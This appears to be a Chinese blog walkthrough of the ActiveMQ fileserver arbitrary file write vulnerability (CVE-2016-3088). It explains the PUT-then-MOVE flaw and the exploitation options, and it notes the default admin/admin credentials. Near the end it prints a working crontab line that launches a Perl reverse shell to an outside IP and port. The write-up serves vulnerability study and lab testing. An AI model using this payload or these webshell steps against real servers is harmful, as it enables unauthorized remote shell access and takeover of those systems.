ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)

漏洞简介

ActiveMQ web控制台分为三个应用,admin、api和fileserver,其中admin为管理员页面,api为接口,fileserver为存放文件的接口;admin和api需要登录才可以使用,fileserver不需要登录。

fileserver 是一个 RESTful API 接口。我们可以通过GET、PUT、DELETE等HTTP请求来读写其中存储的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件的缺陷,但后来发现:

它的使用率不高

文件操作容易出现漏洞

所以ActiveMQ在5.12.x~5.13.x中默认关闭了fileserver应用(可以在conf/jetty.xml中打开);在 5.14.0 之后,文件服务器应用程序被完全删除。

在测试过程中,要注意ActiveMQ的版本,防止无用功。

漏洞详情

这个漏洞出现在Fileserver应用中,漏洞原理其实很简单,就是fileserver支持写文件(但不解析JSP),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用移动请求将其移动到任何位置,从而导致任意文件写入漏洞。

写入cron或ssh key等文件

编写Webshel​​l

写入cron或ssh key等文件

编写jar或jetty.xml等库和配置文件

写webshel​​l的好处是方便,但是fileserver不解析jsp,admin和api都需要登录才能访问,有点白费力气;写cron或者ssh key的好处是直接反向Shell,也方便,坏处是需要root权限;写jar,有点麻烦(需要jar后门),写xml配置文件,这个方法比较靠谱,但是有一个徒劳的地方:我们需要知道ActiveMQ的绝对路径。

下面我们来谈谈上面的几种方法。

写入webshell

前面说过,Webshel​​l需要写在Admin或者Api应用中,两个应用都需要登录才能访问。默认的 ActiveMQ 帐户和密码是admin.

首先访问systemProperties.jsp  查看ActiveMQ的绝对路径:

http://192.168.230.142:8161/admin/test/systemProperties.jsp  

然后上传webshell

 然后将其移动到/opt/activemq/webapps/api/bx.jspWeb 目录中的 API 文件夹

 配置认证的请求头部

 

 crontab 计划任务  反弹shell  这样直接写入crontab是存在问题的,环境变量不会自动读取

 在请求体中最后一字节进行回车换行(换行需从0d0a改成0a)

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.200.29.90";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

 

成功获取shell 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值